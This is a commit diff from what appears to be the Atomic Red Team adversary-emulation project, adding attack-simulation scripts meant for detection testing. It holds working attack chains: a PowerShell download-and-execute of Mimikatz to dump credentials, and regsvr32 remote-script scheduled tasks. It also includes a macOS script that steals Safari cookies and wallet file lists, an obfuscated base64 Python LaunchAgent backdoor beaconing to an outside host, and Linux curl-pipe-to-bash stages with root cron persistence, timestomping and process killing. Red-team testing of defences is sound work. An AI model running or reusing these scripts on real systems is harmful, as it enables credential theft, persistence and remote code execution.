Use site URL

Initial checkin of admin documentation.
Generate docs from job=validate_atomics_generate_docs branch=master
2019-05-07 08:42:29 -06:00 · 2019-05-07 08:37:26 -06:00 · 2019-05-06 16:23:27 +00:00 · 2019-05-06 10:23:02 -06:00 · 2019-05-06 16:17:00 +00:00 · 2019-05-06 10:16:43 -06:00
313 changed files with 169217 additions and 74482 deletions
@@ -0,0 +1,26 @@
+# Report
+
+## What did you do?
+
+ℹ Please replace this with what you did.
+e.g. Run `regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll`
+
+## What did you expect to happen?
+
+ℹ Please replace this with what you expected to happen.
+e.g. The atomic test executes and `calc.exe` is launched.
+
+## What happened instead?
+
+ℹ Please replace this with of what happened instead.
+e.g. 💥
+
+## Your Environment
+
+* Which *specific* operating system are you running (e.g. Windows 7 SP1 32-bit)?
+* Did you run the test from an elevated or root prompt?
+* If relevant, which atomic test is this specific to?
+* If relevant, which [execution harness](2) are you attempting to use?
+
+[1]: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics "atomic tests"
+[2]: https://github.com/redcanaryco/atomic-red-team/tree/master/execution-frameworks "execution frameworks"
@@ -0,0 +1,8 @@
+**Details:**
+<!-- Insert details about this change here. Please include as much detail as possible -->
+
+**Testing:**
+<!-- Note any testing done, local or automated here. -->
+
+**Associated Issues:**
+<!-- Please link any issues that this pull request impacts or fixes. -->
@@ -0,0 +1,11 @@
+#include <stdio.h> 
+ 
+
+//  Simple Hello World for Atomic Red Team payload
+
+int main() { 
+  
+           printf("Hello from Atomic Red Team! \n"); 
+               
+           return 0; 
+}
@@ -8,11 +8,11 @@ $temp = $env:temp
 # Note that these are alias' for Invoke-WebRequest.
 # The concept is to see how curl and wget look in you detection tools vs what is commonly used (IWR, Invoke-WebRequest, etc)

-wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat -OutFile $temp\1.bat
+wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\1.bat

 # Alternate Ending: Using curl

-curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat -OutFile $temp\2.bat
+curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\2.bat

 # Execute the 1.bat file

@@ -9,7 +9,7 @@
 :: Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
 :: Create Scheduled Task With RegSv32 Payload

-SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
+SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30

 SCHTASKS /Run /TN "Atomic Testing"

@@ -18,7 +18,7 @@ SCHTASKS /Delete /TN "Atomic Testing" /F
 :: Tactics: Execution
 :: Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086

-powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
+powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

 :: Tactics: Defense Evasion
 :: Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
@@ -9,7 +9,7 @@
 # Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
 # Create Scheduled Task With RegSv32 Payload

-SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
+SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30

 SCHTASKS /Run /TN "Atomic Testing"

@@ -18,7 +18,7 @@ SCHTASKS /Delete /TN "Atomic Testing" /F
 # Tactics: Execution
 # Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086

-powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
+powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

 # Tactics: Defense Evasion
 # Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
@@ -16,7 +16,7 @@ SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:http
 :: Execution: https://attack.mitre.org/wiki/Technique/T1086
 :: Have PowerShell download the Discovery.bat, output to a local file (for review later)

-powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')" > output.txt
+powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > output.txt

 :: Tactic: Credential Access
 :: Technique: Create Account https://attack.mitre.org/wiki/Technique/T1136
@@ -36,7 +36,7 @@ tasklist.exe | findstr defender
 :: Technique: PowerShell: https://attack.mitre.org/wiki/Technique/T1086
 :: Technique: Multiple Discovery

-powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')"
+powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"

 :: Tactic: Collection
 :: Technique: Automated Collection: https://attack.mitre.org/wiki/Technique/T1119
@@ -0,0 +1,16 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+<key>Label</key>
+<string>cookie-miner-backdoor-launchagent.plist</string>
+<key>ProgramArguments</key>
+<array>
+<string>python</string>
+<string>-c</string>
+<string>import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'));</string>
+</array>
+<key>RunAtLoad</key>
+<true/>
+</dict>
+</plist>
@@ -0,0 +1,14 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+	<key>ProgramArguments</key>
+	<array>
+		<string>/Users/Shared/xmrig2</string>
+	</array>
+	<key>RunAtLoad</key>
+	<true/>
+	<key>Label</key>
+	<string>cookie-miner-payload-launchagent.plist</string>
+</dict>
+</plist>
@@ -0,0 +1,49 @@
+#! /bin/bash
+
+#   Tactic: Discovery
+#   Technique: T1033 - System Owner/User Discovery
+OUTPUT="$(id -un)"
+
+#   Tactic: Collection
+#   Technique: T1005 - Data from Local System
+cd ~/Library/Cookies
+grep -q "coinbase" "Cookies.binarycookies"
+
+#   Tactic: Collection
+#   Technique: T1074 - Data Staged
+mkdir ${OUTPUT}
+cp Cookies.binarycookies ${OUTPUT}/Cookies.binarycookies
+
+#   Tactic: Exfiltration
+#   Technique: T1002 - Data Compressed
+zip -r interestingsafaricookies.zip ${OUTPUT}
+
+#   Tactic: Exfiltration
+#   Technique: T1048 - Exfiltration Over Alternative Protocol
+#   Simulate network connection for exfiltration
+curl https://atomicredteam.io > /dev/null
+
+curl --silent https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py | python - ``
+
+#   Tactic: Discovery
+#   Technique: T1083 - File and Directory Discovery
+find ~ -name "*wallet*" > interestingfiles.txt
+cp interestingfiles.txt ${OUTPUT}/interestingfiles.txt
+
+#   Tactic: Persistence
+#   Technique: T1159 - Launch Agent
+mkdir -p ~/Library/LaunchAgents
+cd ~/Library/LaunchAgents
+curl --silent -o com.apple.rig2.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
+curl --silent -o com.proxy.initialize.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
+launchctl load -w com.apple.rig2.plist
+launchctl load -w com.proxy.initialize.plist
+
+
+cd /Users/Shared
+curl --silent -o xmrig2 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello.macos
+
+#   Tactic: Defense Evasion
+#   Technique: T1222 - File Permissions Modification
+chmod +x ./xmrig2
+./xmrig2
@@ -0,0 +1,25 @@
+# import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep"
+# ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
+# out = ps.stdout.read()
+# ps.stdout.close()
+# if re.search("Little Snitch", out):
+#    sys.exit()
+# import urllib2;
+# UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://atomicredteam.io';t='/news.php';req=urllib2.Request(server+t);
+# req.add_header('User-Agent',UA);
+# req.add_header('Cookie',"session=BmHiW7UA/sf9C279oE2owK9LZ0c=");
+# proxy = urllib2.ProxyHandler();
+# o = urllib2.build_opener(proxy);
+# urllib2.install_opener(o);
+# a=urllib2.urlopen(req).read();
+
+# Tactic: Defense Evasion
+# Technique: T1140 - Deobfuscate/Decode Files or Information
+#
+# Tactic: Discovery
+# Technique: T1057 - Process Discovery
+#
+# Tactic: Command and Control
+# Technique: T1043 - Commonly Used Port
+#
+import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'))
@@ -0,0 +1,17 @@
+#! /bin/bash
+
+cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
+
+#   Tactic: Discovery
+#   Technique: T1082 - System Information discovery
+MIRAI_EXT=`uname -m`
+wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -O mirai.$MIRAI_EXT
+
+#   Tactic: Defense Evasion
+#   Technique: T1222 - File Permissions Modification
+chmod +x mirai.$MIRAI_EXT
+./mirai.$MIRAI_EXT
+
+#   Tactic: Defense Evasion
+#   Technique: T1107 - File Deletion
+rm -rf mirai.$MIRAI_EXT
@@ -0,0 +1,10 @@
+#! /bin/bash
+
+#   Tactic: Defense Evasion
+#   Technique: T1027 - Obfuscated Files or Information
+bash -c "(curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh)|base64 -d |/bin/bash"
+
+# If you want to skip the base64 process, uncommend the following line:
+# bash -c "(curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|/bin/bash"
+
+echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 01" >> /tmp/atomic.log
@@ -0,0 +1,81 @@
+IyEgL2Jpbi9iYXNoCgpmdW5jdGlvbiBjKCkgewpwa2lsbCAtZiBzb3VycGx1bQpwa2lsbCAtZiB4
+bXJpZwpwa2lsbCAtZiBjcnlwdG9uaWdodApwa2lsbCAtZiBzdHJhdHVtCnBraWxsIC1mIG1peG5l
+cmR4CnBraWxsIC1mIG1pbmV4bXIKcGtpbGwgLWYgbWluZXJkCnBraWxsIC1mIG1pbmVyZ2F0ZQpw
+a2lsbCAtZiBrd29ya2VyMzQKcGtpbGwgLWYgWGJhc2gKCiMgICBUYWN0aWM6IERlZmVuc2UgRXZh
+c2lvbgojICAgVGVjaG5pcXVlOiBUMTIyMiAtIEZpbGUgUGVybWlzc2lvbiBNb2RpZmljYXRpb24K
+Y2hhdHRyIC1pIC90bXAva3dvcmtlcmRzIC92YXIvdG1wL2t3b3JrZXJkcwoKIyAgIFRhY3RpYzog
+RGVmZW5zZSBFdmFzaW9uCiMgICBUZWNobmlxdWU6IFQxMTA3IC0gRmlsZSBEZWxldGlvbgpybSAt
+cmYgL3RtcC9rd29ya2VyZHMgL3Zhci90bXAva3dvcmtlcmRzCgojICAgVGFjdGljOiBEaXNjb3Zl
+cnkKIyAgIFRlY2huaXF1ZTogVDEwNTcgLSBQcm9jZXNzIERpc2NvdmVyeQpwcyBhdXhmfGdyZXAg
+LXYgZ3JlcHxncmVwIC12ICJcXyIgfGdyZXAgLXYgImt0aHJlYWRkIiB8Z3JlcCAiXFsuKlxdInxh
+d2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkgPi9kZXYvbnVsbCAyPiYxCnBzIGF1eGZ8Z3Jl
+cCAtdiBncmVwfGdyZXAgInhtcmlnIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+
+L2Rldi9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAiWGJhc2giIHwgYXdrICd7
+cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpwcyBhdXhmfGdyZXAgLXYg
+Z3JlcHxncmVwICJzdHJhdHVtIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rl
+di9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieG1yIiB8IGF3ayAne3ByaW50
+ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8
+Z3JlcCAibWluZXJkIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxs
+IDI+JjEKCiMgICBUYWN0aWM6IERpc2NvdmVyeQojICAgVGVjaG5pcXVlOiBUMTA0OSAtIFN5c3Rl
+bSBOZXR3b3JrIENvbm5lY3Rpb25zIERpc2NvdmVyeQpuZXRzdGF0IC1hbnAgfCBncmVwIDozMzMz
+IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxs
+IC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDo0NDQ0IHxhd2sgJ3twcmlu
+dCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251
+bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDo1NTU1IHxhd2sgJ3twcmludCAkN30nfCBhd2sg
+LUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRz
+dGF0IC1hbnAgfCBncmVwIDo2NjY2IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3By
+aW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBn
+cmVwIDo3Nzc3IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4
+YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDozMzQ3IHxh
+d2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05
+ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDoxNDQ0NCB8YXdrICd7cHJpbnQg
+JDd9J3wgYXdrIC1GJ1svXScgJ3twcmludCAkMX0nIHwgeGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxs
+IDI+JjEKbmV0c3RhdCAtYW5wIHwgZ3JlcCA6MTQ0MzMgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAt
+RidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkgPi9kZXYvbnVsbCAyPiYxCgplY2hv
+ICQoZGF0ZSAtdSkgIkV4ZWN1dGVkIEF0b21pYyBSZWQgVGVhbSBSb2NrZSBhbmQgUm9sbCwgU3Rh
+Z2UgMDIsIHBhcnQgQyIgPj4gL3RtcC9hdG9taWMubG9nCn0KCmZ1bmN0aW9uIGIoKSB7CiAgICBt
+a2RpciAtcCAvdmFyL3RtcAoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lvbgogICAgIyAg
+IFRlY2huaXF1ZTogVDEyMjIgLSBGaWxlIFBlcm1pc3Npb24gTW9kaWZpY2F0aW9uCiAgICBjaG1v
+ZCAxNzc3IC92YXIvdG1wCgogICAgIyAgIFRhY3RpYzogRGVmZW5zZSBFdmFzaW9uCiAgICAjICAg
+VGVjaG5pcXVlOiBUMTAzNiAtIE1hc3F1ZXJhZGluZwogICAgKGN1cmwgLWZzU0wgLS1jb25uZWN0
+LXRpbWVvdXQgMTIwIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnlj
+by9hdG9taWMtcmVkLXRlYW0vbWFzdGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvYXRvbWlj
+LWhlbGxvIC1vIC92YXIvdG1wL2t3b3JrZXJkc3x8d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2Vy
+Y29udGVudC5jb20vcmVkY2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMv
+Q2hhaW5fUmVhY3Rpb25zL2F0b21pYy1oZWxsbyAtTyAvdmFyL3RtcC9rd29ya2VyZHMpICYmIGNo
+bW9kICt4IC92YXIvdG1wL2t3b3JrZXJkcwogICAgbm9odXAgL3Zhci90bXAva3dvcmtlcmRzID4v
+ZGV2L251bGwgMj4mMSAmCgogICAgZWNobyAkKGRhdGUgLXUpICJFeGVjdXRlZCBBdG9taWMgUmVk
+IFRlYW0gUm9ja2UgYW5kIFJvbGwsIFN0YWdlIDAyLCBwYXJ0IEIiID4+IC90bXAvYXRvbWljLmxv
+Zwp9CgpmdW5jdGlvbiBhKCkgewoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lvbgogICAg
+IyAgIFRlY2huaXF1ZTogVDEyMjIgLSBGaWxlIFBlcm1pc3Npb24gTW9kaWZpY2F0aW9uCgljaGF0
+dHIgLWkgL2V0Yy9jcm9uLmQvcm9vdCAvdmFyL3Nwb29sL2Nyb24vcm9vdCAvdmFyL3Nwb29sL2Ny
+b24vY3JvbnRhYnMvcm9vdAoKICAgICMgICBUYWN0aWM6IFBlcnNpc3RlbmNlCiAgICAjICAgVGVj
+aG5pcXVlOiBUMTE2OCAtIExvY2FsIEpvYiBTY2hlZHVsaW5nCgllY2hvIC1lICIqLzEwICogKiAq
+ICogcm9vdCAoY3VybCAtZnNTTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmVk
+Y2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMvQ2hhaW5fUmVhY3Rpb25z
+L3JvY2tlLWFuZC1yb2xsLXN0YWdlLTAyLWRlY29kZWQuc2h8fHdnZXQgLXEgLU8tIGh0dHBzOi8v
+cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFz
+dGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVj
+b2RlZC5zaCl8c2hcbiMjIiA+IC9ldGMvY3Jvbi5kL3Jvb3QKCW1rZGlyIC1wIC92YXIvc3Bvb2wv
+Y3Jvbi9jcm9udGFicwoJZWNobyAtZSAiKi8zMSAqICogKiAqIChjdXJsIC1mc1NMIGh0dHBzOi8v
+cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFz
+dGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVj
+b2RlZC5zaHx8d2dldCAtcSAtTy0gaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Jl
+ZGNhbmFyeWNvL2F0b21pYy1yZWQtdGVhbS9tYXN0ZXIvQVJUaWZhY3RzL0NoYWluX1JlYWN0aW9u
+cy9yb2NrZS1hbmQtcm9sbC1zdGFnZS0wMi1kZWNvZGVkLnNoKXxzaFxuIyMiID4gL3Zhci9zcG9v
+bC9jcm9uL2Nyb250YWJzL3Jvb3QKCW1rZGlyIC1wIC9ldGMvY3Jvbi5kYWlseQoJKGN1cmwgLWZz
+U0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNv
+bS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFzdGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFj
+dGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVjb2RlZC5zaCAtbyAvZXRjL2Nyb24uZGFp
+bHkvb2FuYWNyb25lcnx8d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmVk
+Y2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMvQ2hhaW5fUmVhY3Rpb25z
+L3JvY2tlLWFuZC1yb2xsLXN0YWdlLTAyLWRlY29kZWQuc2ggLU8gL2V0Yy9jcm9uLmRhaWx5L29h
+bmFjcm9uZXIpCgogICAgIyAgIFRhY3RpYzogRGVmZW5zZSBFdmFzaW9uCiAgICAjICAgVGVjaG5p
+cXVlOiBUMTIyMiAtIEZpbGUgUGVybWlzc2lvbiBNb2RpZmljYXRpb24KICAgIGNobW9kIDc1NSAv
+ZXRjL2Nyb24uZGFpbHkvb2FuYWNyb25lcgoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lv
+bgogICAgIyAgIFRlY2huaXF1ZTogVDEwOTkgLSBUaW1lc3RvbXAKCXRvdWNoIC1hY21yIC9iaW4v
+c2ggL2V0Yy9jcm9uLmRhaWx5L29hbmFjcm9uZXIKICAgIHRvdWNoIC1hY21yIC9iaW4vc2ggL2V0
+Yy9jcm9uLmQvcm9vdAogICAgdG91Y2ggLWFjbXIgL2Jpbi9zaCAvdmFyL3Nwb29sL2Nyb24vY3Jv
+bnRhYnMvcm9vdAoKICAgIGVjaG8gJChkYXRlIC11KSAiRXhlY3V0ZWQgQXRvbWljIFJlZCBUZWFt
+IFJvY2tlIGFuZCBSb2xsLCBTdGFnZSAwMiwgcGFydCBBIiA+PiAvdG1wL2F0b21pYy5sb2cKfQoK
+YQpiCmM=
@@ -0,0 +1,90 @@
+#! /bin/bash
+
+function c() {
+pkill -f sourplum
+pkill -f xmrig
+pkill -f cryptonight
+pkill -f stratum
+pkill -f mixnerdx
+pkill -f minexmr
+pkill -f minerd
+pkill -f minergate
+pkill -f kworker34
+pkill -f Xbash
+
+#   Tactic: Defense Evasion
+#   Technique: T1222 - File Permission Modification
+chattr -i /tmp/kworkerds /var/tmp/kworkerds
+
+#   Tactic: Defense Evasion
+#   Technique: T1107 - File Deletion
+rm -rf /tmp/kworkerds /var/tmp/kworkerds
+
+#   Tactic: Discovery
+#   Technique: T1057 - Process Discovery
+ps auxf|grep -v grep|grep -v "\_" |grep -v "kthreadd" |grep "\[.*\]"|awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
+ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
+ps auxf|grep -v grep|grep "Xbash" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
+ps auxf|grep -v grep|grep "stratum" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
+ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
+ps auxf|grep -v grep|grep "minerd" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
+
+#   Tactic: Discovery
+#   Technique: T1049 - System Network Connections Discovery
+netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
+netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
+netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
+netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
+netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
+netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
+netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
+netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
+
